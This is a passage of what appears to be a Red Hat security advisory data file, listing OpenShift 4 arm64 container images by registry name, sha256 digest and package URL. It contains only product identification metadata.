"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3Ab28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3A4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606942"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3Acfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3A1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573139"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3Ae0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604138"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-cluster-api-rhel9-operator@sha256%3A42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3Afe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3Aeb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3A3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3A4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3A5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3A2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572197"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9-operator@sha256%3A0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604638"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3A9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604407"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3Aa8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605056"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564121"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3Afb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3A8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564451"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3Ad07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3Ae95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cloud-controller-manager-rhel9@sha256%3A7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557397"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-cluster-api-controllers-rhel9@sha256%3Ac373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562941"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-rhel9@sha256%3Ab9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602042"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-pd-csi-driver-operator-rhel9@sha256%3Aeb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557339"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"product_id": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-image-customization-controller-rhel9@sha256%3A173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3Ab88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3Aa045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3Af59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3Aa3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3A92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3A358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d?arch=arm64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604115"
}
}
},
{
"category": "product_version",
